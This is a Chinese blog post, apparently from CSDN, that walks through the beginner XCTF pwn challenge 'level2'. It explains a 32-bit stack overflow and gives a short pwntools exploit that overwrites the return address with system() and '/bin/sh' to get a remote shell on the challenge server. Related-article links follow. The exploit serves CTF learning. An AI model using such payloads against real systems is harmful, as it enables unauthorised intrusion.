xctf-pwn新手区 【第一题】

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: xctf-pwn区 pwn入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjjcxy_long/article/details/108699824
版权
前言

书本知识学的差不多了,是时候不看题解来自己做题了(雾)

正文

在这里插入图片描述

攻防世界新手区pwn第一题——level2

下过来附件就一个,没有libc可以连,应该是很适合萌新的

先用虚拟机checksec 看保护,顺便连一下看看

在这里插入图片描述

感动,32位小端序,保护只开了一个NX

在这里插入图片描述

好像输入什么都会返回123
打开ida反汇编看看
在这里插入图片描述

有这么多函数,从main入手

在这里插入图片描述

已经有一点汇编基础了,勉强能看懂。

但还是F5查看伪代码看的爽快
在这里插入图片描述

双击第一个函数进去看看

在这里插入图片描述

这里已经可以看到是一个简单的栈溢出了。因为定义buf是0x88个字节,我们却可以read入0x100个字节,那么可以利用多出的字节把ebp,ret覆盖掉

双击buf

在这里插入图片描述

然后往下拉过属于buf自己的0x88个字节

在这里插入图片描述

这里的s就是ebp的长度,因为是32位,所以有4字节,然后r就是返回地址,也是4字节

这里已经有思路了,现在只要知道ret到哪里可以得到shell就行

刚才main函数里有个system很是敏感
在这里插入图片描述

双击进去,然后找到起始位置

在这里插入图片描述

然后搜索下bin/sh,真的有
在这里插入图片描述

开始写exp

首先from pwn import * 调用pwntools库

然后dog = remote(’ 220.249.52.133’,33973)连接
system = 0x08048320
bin/sh地址 binshaddr = 0x0804A024
按照之前的,先用88个a填满,然后再来4个覆盖ebp,之后用p32(“system”)覆盖掉ret返回的值,之所以加p32是为了转化成小端序。ret了system之后,需要构造system函数的栈帧。
让我们回想一下函数调用栈的时候是如何调用栈帧的:先压入ebp,然后再把参数压进去。所以我们继续构造上 ‘aaaa’ 填补地址,然后就是传参,当然要给system函数传它最爱吃的bin/sh啦,加上p32(binshaddr)

最终构造出
payload = ‘a’ *(0x88+0x04) + p32(system) + ‘aaaa’ + p32(binshaddr)

发送dog.send(payload)

交互dog.interactive()

在这里插入图片描述

mid2dog
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
XCTF-RE】新手练习-maze
08-03
目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-Mobile】新手练习-12.rar
09-01
目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
【python逆向 pyc反编译】python逆向全版本通杀
mid2dog
10-16 8021
【python逆向 pyc反编译】python逆向全版本通杀
闭关学pwn第四天——掌握pwn中需要了解的汇编指令(对第一天栈做相应补充)
mid2dog
08-17 746
前言 pwn现在卡死在ret2libc,知道是返回,却不懂怎么返回,也不知道怎么搞到shellcode,估计是没有相应基础,所以这回补一波pwn中需要掌握的汇编指令。 ——————————————————————————————————— 一 、开天辟地 没错我就是来开天辟地的。 首先…… move push add 这些基础指令肯定要看看的吖 不过pwn里好像需要用到的是这些指令: 子程序 算术...
攻防世界XCTF-Pwn入门11报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 633
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制目,零基础的同学可以看《程序员的自我修养》,主要型包括:缓冲溢出、Return to Libc、格式化字符串、PLT GOT等。
攻防世界pwn新手解-level3
weixin_62621015的博客
04-17 876
攻防世界pwn-level3详细解。
攻防世界hello pwn WP(pwn入门基础
m0_62584974的博客
11-21 2038
攻防世界hello pwn WP(pwn入门基础)的简单讲解
攻防世界xctf PWN leve2详细讲解,两个地址方法
qq_45200829的博客
08-19 189
bin/sh 字符串有,system函数也有,齐活了。溢出把返回地址改成system的地址,再加/bin/sh参数就能拿到shell了。32位程序,启用的保护不多,启用了NX防护。
XCTF-RE】新手练习-logmein
08-03
目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF-RE】新手练习-simple-unpack
08-03
目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
攻防世界 pwn 二进制漏洞简单练习(1-10解)
小哈里的博客
01-12 5495
序 1、level0 目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
【愚公系列】2022年01月 攻防世界-简单-PWN-001(level0)
热门推荐
时光隧道
01-17 3万+
文章目录一、level0二、答步骤1.获取在线场景2.查壳3.IDA总结 一、level0 目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level0 checksec --file=level0 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界Web新手解(超详细)
weixin_52385170的博客
06-21 6806
Web新手
xctf--新手--level2
gclome的博客
04-19 673
writeup: checksec查看保护机制 32位程序,开了NX和Partial RELRO 顺便运行一下: 接着放到IDA里面: 在这里可以看见buf长度是0x88,我们可以的输入0x100个字符,我们在这里是可以发生缓冲溢出 可是这里并没有像上一一样有一个直接调用system("/bin/sh")的函数,所以上的方法显然走不通。 还记得目描述吗?菜鸡请教大神如何获得flag,大...
内存取证工具——volatility 常用命令
mid2dog
09-01 1万+
我是目录前言正文猜测镜像系统调出shell窗口列举进程将内存中的某个进程保存出来列举缓存在内存的注册表列出SAM表中的用户获取最后登录系统的用户获取内存中正运行的程序列举时间线查看开启的windows服务从内存中获取密码哈希扫描电脑中的文件导出列举的文件 前言 红帽杯里也做到过内存取证,取证的课又重温了一遍,于是就准备把常用命令记下来。 正文 猜测镜像系统 volatility -f Memory.vmem imageinfo 在支持的系统里可以看到 知道系统后,之后的命令就都加上这一段即可 –pro
crypto RSA入门
mid2dog
11-29 485
前言 ——————————————————————————— 放心吧,这篇一点rsa都没讲到 rsa算法网上都有很多教程的 但是教程中有很多东西都是一笔带过,比如取模是啥,逆元是啥,完全没讲,一副以为我这个菜狗学过数论[滑稽]的样子。 所以这篇先整理下rsa中需要用到的数论知识。 注:我没怎么看,先罗列着,太菜了看不懂 等以后买本信安数基慢慢研究,先投身pwn的怀抱23333 ——————————...
攻防世界 crypto
mid2dog
12-20 300
数学作业写完了来玩会crypto 1.幂数加密 原理自行百度,然后找个脚本 #! /usr/bin/env python #coding=utf-8 a="8842101220480224404014224202480122" a=a.split("0") flag='' for i in range(0,len(a)): str = a[i] list=[] sum...
目入门指针和动态一二维数组的历程(萌新入门可参考)(上篇)
mid2dog
11-15 194
如果有问求大佬指正…毕竟从百度学的 起因是做到c语言这本书5.13是将两个字符串不用strcat函数连接起来。 本来这是个简单目的,但收获MAX!!!!!!!! 居然写着写着把指针和动态数组搞懂了一点,还把没教的调用函数学了! 于是决定放出来让大家一起来快乐学下嘿嘿嘿(如果以后没听懂某杰讲的可以来康康我的这个鸭)[手动滑稽] 首先我们要写入两个字符串,以前都是规定长度比如str[100]什么...
攻防世界pwn新手答案
08-10
回答: 对于攻防世界pwn新手,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲大小时,会覆盖到相邻的内存域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单练习(1-10解)](https://blog.csdn.net/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值